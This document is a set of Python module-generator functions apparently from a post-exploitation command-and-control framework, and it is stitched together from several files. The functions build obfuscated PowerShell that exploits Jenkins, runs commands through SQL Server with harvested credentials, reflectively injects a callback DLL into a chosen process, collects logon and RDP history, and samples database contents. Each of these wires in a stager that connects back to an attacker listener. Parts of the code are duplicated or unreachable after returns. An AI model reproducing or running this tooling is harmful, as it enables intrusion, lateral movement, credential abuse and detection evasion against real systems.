if cred.password != "":
params["Password"] = "******" + cred.password + "'"
if params["Domain"] == "" or params["UserName"] == "" or params[
"Password"] == "":
return handle_error_message(
"[!] Domain/UserName/Password or CredID required!")
for option, values in params.items():
if option.lower() != "agent" and option.lower() != "credid":
if values and values != '':
if values.lower() == "true":
# if we're just adding a switch
script_end += " -" + str(option)
else:
script_end += " -" + str(option) + " '" + str(
values) + "'"
if obfuscate:
script_end = helpers.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
# Set booleans to false by default
obfuscate = False
# extract all of our options
listener_name = params['Listener']
user_agent = params['UserAgent']
proxy = params['Proxy']
proxy_creds = params['ProxyCreds']
if (params['Obfuscate']).lower() == 'true':
obfuscate = True
obfuscate_command = params['ObfuscateCommand']
# generate the launcher code
launcher = main_menu.stagers.generate_launcher(
listener_name,
language='powershell',
encode=True,
obfuscate=obfuscate,
obfuscationCommand=obfuscate_command,
userAgent=user_agent,
proxy=proxy,
proxyCreds=proxy_creds,
bypasses=params['Bypasses'])
if launcher == "":
return handle_error_message(
"[!] Error in launcher command generation.")
else:
#Cmd = launcher
print(helpers.color("Agent Launcher code: " + launcher))
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/exploitation/Exploit-Jenkins.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source,
obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source",
"obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
module_code = f.read()
f.close()
script = module_code
script_end = "\nExploit-Jenkins"
script_end += " -Rhost " + str(params['Rhost'])
script_end += " -Port " + str(params['Port'])
script_end += " -Cmd \"" + launcher + "\""
if obfuscate:
script_end = helpers.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
cred_id = params["CredID"]
if cred_id != "":
if not main_menu.credentials.is_credential_valid(cred_id):
return handle_error_message("[!] CredID is invalid!")
cred: Credential = main_menu.credentials.get_credentials(cred_id)
if cred.domain != "":
params["UserName"] = str(cred.domain) + "\\" + str(
cred.username)
else:
params["UserName"] = str(cred.username)
if cred.password != "":
params["Password"] = cred.password
# Set booleans to false by default
obfuscate = False
listener_name = params['Listener']
userAgent = params['UserAgent']
proxy = params['Proxy']
proxy_creds = params['ProxyCreds']
instance = params['Instance']
command = params['Command']
username = params['UserName']
password = params['Password']
if (params['Obfuscate']).lower() == 'true':
obfuscate = True
obfuscate_command = params['ObfuscateCommand']
module_source = main_menu.installPath + "/data/module_source/lateral_movement/Invoke-SQLOSCmd.ps1"
module_code = ""
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source,
obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source",
"obfuscated_module_source")
try:
with open(module_source, 'r') as source:
module_code = source.read()
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
script = module_code
if command == "":
if not main_menu.listeners.is_listener_valid(listener_name):
return handle_error_message("[!] Invalid listener: " +
listener_name)
else:
launcher = main_menu.stagers.generate_launcher(
listener_name,
language='powershell',
encode=True,
obfuscate=obfuscate,
obfuscationCommand=obfuscate_command,
userAgent=userAgent,
proxy=proxy,
proxyCreds=proxy_creds,
bypasses=params['Bypasses'])
if launcher == "":
return handle_error_message(
"[!] Error generating launcher")
else:
command = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
script_end = "Invoke-SQLOSCmd -Instance \"%s\" -Command \"%s\"" % (
instance, command)
if username != "":
script_end += " -UserName " + username
if password != "":
script_end += " -Password " + password
if obfuscate:
script_end = helpers.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
# Set booleans to false by default
obfuscate = False
def rand_text_alphanumeric(size=15,
chars=string.ascii_uppercase +
string.digits):
return ''.join(random.choice(chars) for _ in range(size))
fname = rand_text_alphanumeric() + ".dll"
listener_name = params['Listener']
proc_name = params['ProcName'].strip()
upload_path = params['UploadPath'].strip()
arch = params['Arch'].strip()
full_upload_path = upload_path + "\\" + fname
if proc_name == '':
return handle_error_message("[!] ProcName must be specified.")
# staging options
user_agent = params['UserAgent']
proxy = params['Proxy']
proxy_creds = params['ProxyCreds']
if (params['Obfuscate']).lower() == 'true':
obfuscate = True
obfuscate_command = params['ObfuscateCommand']
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/management/Invoke-ReflectivePEInjection.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source,
obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source",
"obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
module_code = f.read()
f.close()
script = module_code
script_end = ""
if not main_menu.listeners.is_listener_valid(listener_name):
# not a valid listener, return nothing for the script
return handle_error_message("[!] Invalid listener: %s" %
(listener_name))
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = main_menu.stagers.generate_launcher(
listener_name,
language='powershell',
encode=True,
obfuscate=obfuscate,
obfuscationCommand=obfuscate_command,
userAgent=user_agent,
proxy=proxy,
proxyCreds=proxy_creds,
bypasses=params['Bypasses'])
if launcher == '':
return handle_error_message(
'[!] Error in launcher generation.')
else:
launcher_code = launcher.split(' ')[-1]
script_end += "Invoke-ReflectivePEInjection -PEPath %s -ProcName %s " % (
full_upload_path, proc_name)
dll = main_menu.stagers.generate_dll(launcher_code, arch)
upload_script = main_menu.stagers.generate_upload(
dll, full_upload_path)
if obfuscate:
script_end = helpers.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=obfuscation_command)
script += "\r\n"
script += upload_script
script += "\r\n"
script += script_end
script += "\r\n"
script += "Remove-Item -Path %s" % full_upload_path
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/situational_awareness/host/Get-ComputerDetails.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source,
obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source",
"obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
module_code = f.read()
f.close()
script = module_code + "\n\n"
script_end = ""
outputf = params.get("OutputFunction", "Out-String")
for option, values in params.items():
if option.lower() != "agent" and option.lower(
) != "outputfunction":
if values and values != '':
if option == "4624":
script_end += "$SecurityLog = Get-EventLog -LogName Security; $Filtered4624 = Find-4624Logons $SecurityLog;"
script_end += 'Write-Output "Event ID 4624 (Logon):`n";'
script_end += "Write-Output $Filtered4624.Values"
script_end += f" | {outputf}"
script_end = data_util.keyword_obfuscation(script_end)
for option, values in params.items():
if option.lower() != "agent" and option.lower(
) != "outputfunction":
if values and values != '':
if option == "4624":
script_end += "$SecurityLog = Get-EventLog -LogName Security; $Filtered4624 = Find-4624Logons $SecurityLog;"
script_end += 'Write-Output "Event ID 4624 (Logon):`n";'
script_end += "Write-Output $Filtered4624.Values"
script_end += f" | {outputf}"
if obfuscate:
script_end = helpers.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=obfuscation_command)
script += script_end
return script
if option == "4648":
script_end += "$SecurityLog = Get-EventLog -LogName Security; $Filtered4648 = Find-4648Logons $SecurityLog;"
script_end += 'Write-Output "Event ID 4648 (Explicit Credential Logon):`n";'
script_end += "Write-Output $Filtered4648.Values"
script_end += f" | {outputf}"
if obfuscate:
script_end = helpers.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=obfuscation_command)
script += script_end
return script
if option == "AppLocker":
script_end += "$AppLockerLogs = Find-AppLockerLogs;"
script_end += 'Write-Output "AppLocker Process Starts:`n";'
script_end += "Write-Output $AppLockerLogs.Values"
script_end += f" | {outputf}"
if obfuscate:
script_end = helpers.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=obfuscation_command)
script += script_end
return script
if option == "PSLogs":
script_end += "$PSLogs = Find-PSScriptsInPSAppLog;"
script_end += 'Write-Output "PowerShell Script Executions:`n";'
script_end += "Write-Output $PSLogs.Values"
script_end += f" | {outputf}"
if obfuscate:
script_end = helpers.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=obfuscation_command)
script += script_end
return script
if option == "SavedRDP":
script_end += "$RdpClientData = Find-RDPClientConnections;"
script_end += 'Write-Output "RDP Client Data:`n";'
script_end += "Write-Output $RdpClientData.Values"
script_end += f" | {outputf}"
if obfuscate:
script_end = helpers.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=obfuscation_command)
script += script_end
return script
# if we get to this point, no switched were specified
script_end += "Get-ComputerDetails -Limit " + str(params['Limit'])
if (outputf == "Out-String"):
script_end += " -ToString | " + '%{$_ + \"`n\"};"`n' + str(
module.name.split("/")[-1]) + ' completed!"'
else:
script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(
module.name.split("/")[-1]) + ' completed!"'
if obfuscate:
script_end = helpers.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(
main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = "",
) -> Tuple[Optional[str], Optional[str]]:
# First method: Read in the source script from module_source
module_source = main_menu.installPath + "/data/module_source/..."
if obfuscate:
data_util.obfuscate_module(
moduleSource=module_source, obfuscationCommand=obfuscation_command
)
module_source = module_source.replace(
"module_source", "obfuscated_module_source"
)
try:
f = open(module_source, "r")
except:
return handle_error_message(
"[!] Could not read module source path at: " + str(module_source)
)
module_code = f.read()
f.close()
# If you'd just like to import a subset of the functions from the
# module source, use the following:
# script = helpers.generate_dynamic_powershell_script(module_code, ["Get-Something", "Set-Something"])
script = module_code
# Second method: For calling your imported source, or holding your
# inlined script. If you're importing source using the first method,
# ensure that you append to the script variable rather than set.
#
# The script should be stripped of comments, with a link to any
# original reference script included in the comments.
#
# If your script is more than a few lines, it's probably best to use
# the first method to source it.
#
# script += """
script = """
function Invoke-Something {
}
Invoke-Something"""
scriptEnd = ""
# Add any arguments to the end execution of the script
for option, values in params.items():
if option.lower() != "agent":
if values and values != "":
if values.lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(values)
if obfuscate:
scriptEnd = helpers.obfuscate(
psScript=scriptEnd,
installPath=main_menu.installPath,
obfuscationCommand=obfuscation_command,
)
script += scriptEnd
script = data_util.keyword_obfuscation(script)
return script
def generate(
main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = "",
):
username = params["Username"]
password = params["Password"]
instance = params["Instance"]
no_defaults = params["NoDefaults"]
check_all = params["CheckAll"]
script_end = ""
# read in the common module source code
script, err = main_menu.modules.get_module_source(
module_name="collection/Get-SQLColumnSampleData.ps1",
obfuscate=obfuscate,
obfuscate_command=obfuscation_command,
)
if check_all:
aux_module_source = main_menu.modules.get_module_source(
module_name=
"situational_awareness/network/Get-SQLInstanceDomain.ps1",
obfuscate=obfuscate,
obfuscate_command=obfuscation_command,
)
if obfuscate:
data_util.obfuscate_module(
moduleSource=aux_module_source,
obfuscationCommand=obfuscation_command,
)
aux_module_source = module_source.replace(
"module_source", "obfuscated_module_source")
try:
with open(aux_module_source, "r") as auxSource:
aux_script = auxSource.read()
script += " " + aux_script
except:
print(
helpers.color(
"[!] Could not read additional module source path at: "
+ str(aux_module_source)))
script_end = " Get-SQLInstanceDomain "
if username != "":
script_end += " -Username " + username
if password != "":
script_end += " -Password " + password
script_end += " | "
script_end += " Get-SQLColumnSampleData"
if username != "":
script_end += " -Username " + username
if password != "":
script_end += " -Password " + password
if instance != "" and not check_all:
script_end += " -Instance " + instance
if no_defaults:
script_end += " -NoDefaults "
outputf = params.get("OutputFunction", "Out-String")
script_end += (f" | {outputf} | " + '%{$_ + "`n"};"`n' +
str(module.name.split("/")[-1]) + ' completed!"')
script = main_menu.modules.finalize_module(
script=script,
script_end=script_end,
obfuscate=obfuscate,
obfuscation_command=obfuscation_command,
)
return script
